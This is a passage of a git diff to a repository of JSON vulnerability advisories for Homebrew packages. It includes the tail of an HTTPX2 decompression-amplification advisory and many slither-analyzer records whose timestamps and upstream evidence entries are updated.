"2026-09-10T20:37:33Z", + "upstream": [ + "GHSA-8xx6-hgc6-gc2m", + "CVE-2026-84382", + "PYSEC-2026-3846" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "rapid-mlx", + "purl": "pkg:brew/rapid-mlx" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.11.3" + }, + { + "fixed": "0.12.16" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.12.0", + "resource": "httpx2", + "resource_purl": "pkg:pypi/httpx2@2.12.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "httpx2", + "subject_version": "2.12.0", + "key": "pkg:pypi/httpx2@2.12.0", + "resource": "httpx2" + } + ] + }, + "summary": "HTTPX2: Streaming response decompression does not bound peak memory (decompression amplification)", + "details": "### Summary\n\nWhen decoding a compressed response body (`gzip`, `deflate`, `br`, or `zstd`), HTTPX2 fully decompressed each network read before yielding content to the application. A small compressed input could therefore cause a large intermediate memory allocation, even when the application streamed the response to keep memory usage bounded.\n\n### Details\n\nHTTPX2's default transport reads the socket in pieces of up to 64 KiB. Before `2.12.0`, each piece was inflated completely into one intermediate allocation before any decompressed bytes were yielded.\n\nAt DEFLATE's maximum compression ratio of roughly 1032:1, a 64 KiB compressed chunk can expand to about 64 MiB in one allocation. Brotli and Zstandard responses can cause similarly large amplification. Streaming the response did not prevent these transient allocations.\n\n### Impact\n\nApplications that fetch resources from untrusted or attacker-influenced servers - such as webhook receivers, link unfurlers, crawlers, SSRF-reachable fetchers, and redirect followers - can experience memory pressure or out-of-memory termination when processing a malicious compressed response. No authentication or user interaction is required beyond issuing a request to the server.\n\n### Mitigation\n\nUpgrade to HTTPX2 `2.12.0` or later. Patched versions decompress responses incrementally with bounded intermediate buffers, including responses with multiple content encodings.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/security/advisories/GHSA-8xx6-hgc6-gc2m" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-84382" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/pull/1126" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/commit/4fd0c70a3f207c618b145934792f791bccfb39f8" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pydantic/httpx2" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/releases/tag/v2.12.0" + } + ] +} diff --git a/advisories/BREW-slither-analyzer-CVE-2014-1829.json b/advisories/BREW-slither-analyzer-CVE-2014-1829.json index 5e2a164b122..cffb9aa74ef 100644 --- a/advisories/BREW-slither-analyzer-CVE-2014-1829.json +++ b/advisories/BREW-slither-analyzer-CVE-2014-1829.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2014-1829", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-cfj3-7x9c-4p3h", "CVE-2014-1829", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2014-1830.json b/advisories/BREW-slither-analyzer-CVE-2014-1830.json index 0a13278ef4b..8daafd1427c 100644 --- a/advisories/BREW-slither-analyzer-CVE-2014-1830.json +++ b/advisories/BREW-slither-analyzer-CVE-2014-1830.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2014-1830", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-652x-xj99-gmcc", "CVE-2014-1830", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2015-2296.json b/advisories/BREW-slither-analyzer-CVE-2015-2296.json index 12f9eda7da1..c9481018afb 100644 --- a/advisories/BREW-slither-analyzer-CVE-2015-2296.json +++ b/advisories/BREW-slither-analyzer-CVE-2015-2296.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2015-2296", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-pg2w-x9wp-vw92", "CVE-2015-2296", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2016-9015.json b/advisories/BREW-slither-analyzer-CVE-2016-9015.json index d87a3901ce0..440b23bf98e 100644 --- a/advisories/BREW-slither-analyzer-CVE-2016-9015.json +++ b/advisories/BREW-slither-analyzer-CVE-2016-9015.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2016-9015", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-v4w5-p2hg-8fh6", "CVE-2016-9015", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2018-1000518.json b/advisories/BREW-slither-analyzer-CVE-2018-1000518.json index 9b61f528641..2e23607ba6d 100644 --- a/advisories/BREW-slither-analyzer-CVE-2018-1000518.json +++ b/advisories/BREW-slither-analyzer-CVE-2018-1000518.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2018-1000518", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-6g87-ff9q-v847", "CVE-2018-1000518", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "websockets", - "subject_version": "15.0.1", - "key": "pkg:pypi/websockets@15.0.1", - "resource": "websockets" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2018-15560.json b/advisories/BREW-slither-analyzer-CVE-2018-15560.json index 8fc0f002bd3..07ec27d3a40 100644 --- a/advisories/BREW-slither-analyzer-CVE-2018-15560.json +++ b/advisories/BREW-slither-analyzer-CVE-2018-15560.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2018-15560", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-hgg3-g7gr-66r7", "CVE-2018-15560", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pycryptodome", - "subject_version": "3.23.0", - "key": "pkg:pypi/pycryptodome@3.23.0", - "resource": "pycryptodome" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2018-18074.json b/advisories/BREW-slither-analyzer-CVE-2018-18074.json index 1b5fd85f98b..19551558db9 100644 --- a/advisories/BREW-slither-analyzer-CVE-2018-18074.json +++ b/advisories/BREW-slither-analyzer-CVE-2018-18074.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2018-18074", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-x84v-xcm2-53pg", "CVE-2018-18074", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2018-20060.json b/advisories/BREW-slither-analyzer-CVE-2018-20060.json index 5a733fdb36e..583b0ee2577 100644 --- a/advisories/BREW-slither-analyzer-CVE-2018-20060.json +++ b/advisories/BREW-slither-analyzer-CVE-2018-20060.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2018-20060", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-www2-v7xj-xrc6", "CVE-2018-20060", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2018-25091.json b/advisories/BREW-slither-analyzer-CVE-2018-25091.json index 36f867b7b22..57d1ece545a 100644 --- a/advisories/BREW-slither-analyzer-CVE-2018-25091.json +++ b/advisories/BREW-slither-analyzer-CVE-2018-25091.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2018-25091", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-gwvm-45gx-3cf8", "CVE-2018-25091", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2019-11236.json b/advisories/BREW-slither-analyzer-CVE-2019-11236.json index 1ae8c55785c..366d559d66d 100644 --- a/advisories/BREW-slither-analyzer-CVE-2019-11236.json +++ b/advisories/BREW-slither-analyzer-CVE-2019-11236.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2019-11236", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-r64q-w8jr-g9qp", "CVE-2019-11236", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2019-11324.json b/advisories/BREW-slither-analyzer-CVE-2019-11324.json index e4dfb5e503c..7c02c45ab43 100644 --- a/advisories/BREW-slither-analyzer-CVE-2019-11324.json +++ b/advisories/BREW-slither-analyzer-CVE-2019-11324.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2019-11324", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-mh33-7rrq-662w", "CVE-2019-11324", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2020-26137.json b/advisories/BREW-slither-analyzer-CVE-2020-26137.json index ca36e857672..aba86f7067f 100644 --- a/advisories/BREW-slither-analyzer-CVE-2020-26137.json +++ b/advisories/BREW-slither-analyzer-CVE-2020-26137.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2020-26137", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-wqvq-5m8c-6g24", "CVE-2020-26137", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2020-7212.json b/advisories/BREW-slither-analyzer-CVE-2020-7212.json index 4d4f9e31a3d..52025a5f035 100644 --- a/advisories/BREW-slither-analyzer-CVE-2020-7212.json +++ b/advisories/BREW-slither-analyzer-CVE-2020-7212.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2020-7212", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-hmv2-79q8-fv6g", "CVE-2020-7212", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2021-21330.json b/advisories/BREW-slither-analyzer-CVE-2021-21330.json index 28a5f629d88..18f352ad51a 100644 --- a/advisories/BREW-slither-analyzer-CVE-2021-21330.json +++ b/advisories/BREW-slither-analyzer-CVE-2021-21330.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2021-21330", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-v6wp-4m6f-gcjg", "CVE-2021-21330", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2021-28363.json b/advisories/BREW-slither-analyzer-CVE-2021-28363.json index 55fb5acf98c..faf1ce2bde0 100644 --- a/advisories/BREW-slither-analyzer-CVE-2021-28363.json +++ b/advisories/BREW-slither-analyzer-CVE-2021-28363.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2021-28363", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-5phf-pp7p-vc2r", "CVE-2021-28363", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2021-33503.json b/advisories/BREW-slither-analyzer-CVE-2021-33503.json index 895bcf73f0c..9799951d547 100644 --- a/advisories/BREW-slither-analyzer-CVE-2021-33503.json +++ b/advisories/BREW-slither-analyzer-CVE-2021-33503.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2021-33503", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-q2q7-5pp4-w6pg", "CVE-2021-33503", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2021-33880.json b/advisories/BREW-slither-analyzer-CVE-2021-33880.json index d0bb11fcab9..6b3ca99ace1 100644 --- a/advisories/BREW-slither-analyzer-CVE-2021-33880.json +++ b/advisories/BREW-slither-analyzer-CVE-2021-33880.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2021-33880", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-8ch4-58qp-g3mp", "CVE-2021-33880", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "websockets", - "subject_version": "15.0.1", - "key": "pkg:pypi/websockets@15.0.1", - "resource": "websockets" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2022-1930.json b/advisories/BREW-slither-analyzer-CVE-2022-1930.json index 8226b2e2037..7531511961d 100644 --- a/advisories/BREW-slither-analyzer-CVE-2022-1930.json +++ b/advisories/BREW-slither-analyzer-CVE-2022-1930.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2022-1930", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-v65g-f3cj-fjp4", "CVE-2022-1930", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "eth-account", - "subject_version": "0.13.7", - "key": "pkg:pypi/eth-account@0.13.7", - "resource": "eth-account" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2023-32681.json b/advisories/BREW-slither-analyzer-CVE-2023-32681.json index 9ad349ece2b..c96fe9c7d92 100644 --- a/advisories/BREW-slither-analyzer-CVE-2023-32681.json +++ b/advisories/BREW-slither-analyzer-CVE-2023-32681.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2023-32681", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-j8r2-6x86-q33q", "CVE-2023-32681", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2023-37276.json b/advisories/BREW-slither-analyzer-CVE-2023-37276.json index 5ca49b69333..4103233cb6a 100644 --- a/advisories/BREW-slither-analyzer-CVE-2023-37276.json +++ b/advisories/BREW-slither-analyzer-CVE-2023-37276.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2023-37276", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-45c4-8wx5-qw6w", "CVE-2023-37276", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2023-43804.json b/advisories/BREW-slither-analyzer-CVE-2023-43804.json index 153335973f1..56146ce30b8 100644 --- a/advisories/BREW-slither-analyzer-CVE-2023-43804.json +++ b/advisories/BREW-slither-analyzer-CVE-2023-43804.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2023-43804", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-v845-jxx5-vc9f", "CVE-2023-43804", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2023-45803.json b/advisories/BREW-slither-analyzer-CVE-2023-45803.json index 16fb3019094..006bcf64b86 100644 --- a/advisories/BREW-slither-analyzer-CVE-2023-45803.json +++ b/advisories/BREW-slither-analyzer-CVE-2023-45803.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2023-45803", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-g4mx-q9vg-27p4", "CVE-2023-45803", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2023-47627.json b/advisories/BREW-slither-analyzer-CVE-2023-47627.json index 352ea4aa28e..705509b2d6a 100644 --- a/advisories/BREW-slither-analyzer-CVE-2023-47627.json +++ b/advisories/BREW-slither-analyzer-CVE-2023-47627.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2023-47627", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-gfw2-4jvh-wgfg", "CVE-2023-47627", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2023-47641.json b/advisories/BREW-slither-analyzer-CVE-2023-47641.json index e18798c593f..4c0e5cda860 100644 --- a/advisories/BREW-slither-analyzer-CVE-2023-47641.json +++ b/advisories/BREW-slither-analyzer-CVE-2023-47641.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2023-47641", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-xx9p-xxvh-7g8j", "CVE-2023-47641", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2023-49081.json b/advisories/BREW-slither-analyzer-CVE-2023-49081.json index 37a48f08e02..2b64856afa8 100644 --- a/advisories/BREW-slither-analyzer-CVE-2023-49081.json +++ b/advisories/BREW-slither-analyzer-CVE-2023-49081.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2023-49081", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-q3qx-c6g2-7pw2", "CVE-2023-49081", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2023-49082.json b/advisories/BREW-slither-analyzer-CVE-2023-49082.json index 5123f624c07..f794ca4d900 100644 --- a/advisories/BREW-slither-analyzer-CVE-2023-49082.json +++ b/advisories/BREW-slither-analyzer-CVE-2023-49082.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2023-49082", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-qvrw-v9rv-5rjx", "CVE-2023-49082", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2023-52323.json b/advisories/BREW-slither-analyzer-CVE-2023-52323.json index 49e9f3ee481..bc859fcaea1 100644 --- a/advisories/BREW-slither-analyzer-CVE-2023-52323.json +++ b/advisories/BREW-slither-analyzer-CVE-2023-52323.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2023-52323", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-j225-cvw7-qrx7", "CVE-2023-52323", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pycryptodome", - "subject_version": "3.23.0", - "key": "pkg:pypi/pycryptodome@3.23.0", - "resource": "pycryptodome" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2024-23334.json b/advisories/BREW-slither-analyzer-CVE-2024-23334.json index cde07487702..18563583fc9 100644 --- a/advisories/BREW-slither-analyzer-CVE-2024-23334.json +++ b/advisories/BREW-slither-analyzer-CVE-2024-23334.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2024-23334", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-5h86-8mv2-jq9f", "CVE-2024-23334", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2024-23829.json b/advisories/BREW-slither-analyzer-CVE-2024-23829.json index 3544d9fba90..b53e0005274 100644 --- a/advisories/BREW-slither-analyzer-CVE-2024-23829.json +++ b/advisories/BREW-slither-analyzer-CVE-2024-23829.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2024-23829", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-8qpw-xqxj-h4r2", "CVE-2024-23829", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2024-26134.json b/advisories/BREW-slither-analyzer-CVE-2024-26134.json index 43ac2daf526..b599e9eff79 100644 --- a/advisories/BREW-slither-analyzer-CVE-2024-26134.json +++ b/advisories/BREW-slither-analyzer-CVE-2024-26134.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2024-26134", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-375g-39jq-vq7m", "CVE-2024-26134", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "cbor2", - "subject_version": "6.1.3", - "key": 